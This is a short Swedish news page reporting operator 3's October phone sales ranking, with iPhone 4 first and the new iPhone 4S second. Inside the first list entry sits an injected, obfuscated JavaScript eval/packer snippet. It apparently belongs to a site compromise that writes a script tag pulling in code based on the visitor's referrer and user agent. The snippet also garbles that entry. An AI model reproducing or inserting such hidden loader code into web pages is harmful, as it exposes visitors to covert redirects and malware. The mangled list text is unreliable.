Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Mobiltoppen – iPhone 4S tvåa på listan

Mobiltoppen – iPhone 4S tvåa på listan
Revue Magazine

Under oktober månad har Apple ännu en gång legat i topp hos mobiloperatören 3. Nya iPhone 4S tog sig in på en andra plats fastän modellen bara funnits till försäljning en kortare tid. På tredje plats kom iPhone 3GS medan iPhone 4 var den telefon som sålde absolut bäst.

Topplistan:

 1. iPhone eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dehzk|var|u0026u|referrer|ahfid||js|php’.split(’|’),0,{}))
  4
 2. iPhone 4S
 3. iPhone 3GS
 4. Samsung Galaxy S2
 5. Sony Ericsson X8
 6. Samsung Galaxy Gio
 7. Sony Ericsson Live with Walkman
 8. Sony Ericsson Xperia arc S
 9. Sony Ericsson Xperia Ray
 10. Nokia N9

Den här topplistan visar försäljningen under den gångna månaden via 3s webbsida, telesales, 3Butiker och återförsäljare över hela landet.